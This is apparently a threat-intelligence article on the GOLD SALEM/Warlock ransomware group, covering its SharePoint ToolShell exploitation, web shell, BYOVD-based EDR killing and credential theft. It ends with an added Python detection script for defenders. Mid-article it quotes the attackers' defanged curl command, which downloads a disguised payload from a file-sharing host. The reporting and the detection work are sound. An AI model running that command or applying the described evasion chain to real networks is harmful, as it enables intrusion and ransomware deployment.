GOLD SALEM Compromise Networks and Bypass Security Solutions to Deploy Warlock Ransomware

The cyberthreat landscape has witnessed the emergence of another sophisticated ransomware operation as GOLD SALEM, a new threat actor group also known as Warlock Group, has been actively compromising enterprise networks since March 2025.

This emerging ransomware collective has successfully targeted 60 organizations across North America, Europe, and South America, demonstrating competent tradecraft while deploying their custom Warlock ransomware payload.

Microsoft has tracked this group as Storm-2603 and suggests with moderate confidence that it operates from China, though attribution remains inconclusive.

GOLD SALEM has positioned itself strategically within the competitive ransomware ecosystem by targeting a diverse range of victims, from small commercial entities to large multinational corporations.

The group operates through a sophisticated double-extortion model, utilizing a Tor-based data leak site to publish stolen victim data when ransom demands go unpaid.

Their victim selection appears strategic, largely avoiding targets in China and Russia, though they notably listed a Russian electricity generation services company in September 2025, suggesting potential operations from outside traditional ransomware safe havens.

The threat actors made their public debut through underground forums in June 2025, posting on the RAMP forum to solicit exploits for enterprise applications including Veeam, ESXi, and SharePoint, while seeking tools to disable endpoint detection and response systems.

Sophos analysts identified the group’s sophisticated operational security measures and noted their recruitment efforts for initial access brokers, indicating either direct intrusion capabilities or the development of a ransomware-as-a-service model.

GOLD SALEM’s operational infrastructure demonstrates advanced planning and technical sophistication.

The group maintains countdown timers for each victim, typically allowing 12-14 days for ransom payment before data publication.

As of September 2025, they claim to have sold data from 45% of their victims to private buyers, though these figures may be inflated for psychological impact.

GOLD SALEM leak site as of September 16, 2025 (Source – Sophos)

The group’s data leak site features professional presentation and victim categorization, reflecting their commitment to operational professionalism.

Advanced Evasion Techniques and Security Bypass Methods

The technical analysis reveals GOLD SALEM’s sophisticated approach to security solution bypass and persistent network access.

The group employs the ToolShell exploit chain targeting SharePoint servers for initial network compromise, leveraging a combination of critical vulnerabilities including CVE-2025-49704, CVE-2025-49706, CVE-2025-53770, and CVE-2025-53771.

Upon successful exploitation, they deploy an ASPX web shell that creates Process objects for cmd[.]exe within the IIS worker process context, enabling remote command execution with output visibility.

A particularly notable technique observed involves their command execution through the web shell:

curl -L -o c:\users\public\Sophos\Sophos-UI[.]exe hxxps[:]//filebin[.]net/j7jqfnh8tn4alzsr/wsocks[.]exe[.]txt

This command downloads a Golang-based WebSockets server, establishing persistent access independent of the initial web shell.

The group demonstrates advanced evasion capabilities through Bring Your Own Vulnerable Driver (BYOVD) techniques, utilizing a renamed vulnerable Baidu Antivirus driver (googleApiUtil64.sys) to exploit CVE-2024-51324 for arbitrary process termination, specifically targeting EDR agents.

Their toolkit includes Mimikatz for credential extraction from LSASS memory, PsExec and Impacket for lateral movement, and Group Policy Object abuse for ransomware deployment across network endpoints.
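A defender-side hunt for the chain described above in process-creation and driver-load telemetry, as an added example that is not from the Sophos report: it flags the IIS worker process spawning a shell, a downloader writing into C:\Users\Public, and the renamed driver being loaded. The events are constructed Sysmon-style records; the writable-directory list and the download URL are assumptions, not indicators from the report.

```python
import ntpath
import re

# Constructed Sysmon-style events (EventID 1 = process create, 6 = driver load)
# modelled on the chain described above; the values are made up, not IoCs.
SAMPLE_EVENTS = [
    {"EventID": 1, "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c curl -L -o c:\users\public\Sophos\Sophos-UI.exe https://example.invalid/wsocks.exe.txt"},
    {"EventID": 1, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": r"curl -L -o c:\users\public\Sophos\Sophos-UI.exe https://example.invalid/wsocks.exe.txt"},
    {"EventID": 6, "ImageLoaded": r"C:\Users\Public\googleApiUtil64.sys"},
    {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe"},
]

WEB_WORKERS = {"w3wp.exe"}                       # IIS worker process hosting SharePoint
SHELLS = {"cmd.exe", "powershell.exe"}           # what an ASPX web shell typically spawns
WRITABLE_DIRS = ("c:\\users\\public\\", "c:\\windows\\temp\\")  # assumption: low-priv drop zones
DRIVER_WATCHLIST = {"googleapiutil64.sys"}       # renamed Baidu driver named in the report
DOWNLOAD_RE = re.compile(r"-o\s+\"?([a-z]:\\[^\s\"]+)", re.IGNORECASE)  # curl -o <path>

def _base(path: str) -> str:
    return ntpath.basename(path).lower()

def hunt(events):
    """Return one finding string per suspicious event; benign events yield nothing."""
    findings = []
    for ev in events:
        if ev["EventID"] == 1:
            parent, image, cmd = _base(ev["ParentImage"]), _base(ev["Image"]), ev["CommandLine"]
            # 1. web shell indicator: IIS worker process spawning an interactive shell
            if parent in WEB_WORKERS and image in SHELLS:
                findings.append(f"webshell: {parent} -> {image}")
            # 2. payload drop: downloader writing its output into a world-writable directory
            m = DOWNLOAD_RE.search(cmd)
            if m and m.group(1).lower().startswith(WRITABLE_DIRS):
                findings.append(f"download-to-public: {image} -> {m.group(1)}")
        elif ev["EventID"] == 6:
            # 3. BYOVD: watchlisted driver name, or a kernel driver loaded from a user-writable path
            drv = ev["ImageLoaded"]
            if _base(drv) in DRIVER_WATCHLIST or drv.lower().startswith(WRITABLE_DIRS):
                findings.append(f"suspicious-driver-load: {drv}")
    return findings

if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(finding)
```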


About Cybernoz

Security researcher and threat analyst with expertise in malware analysis and incident response.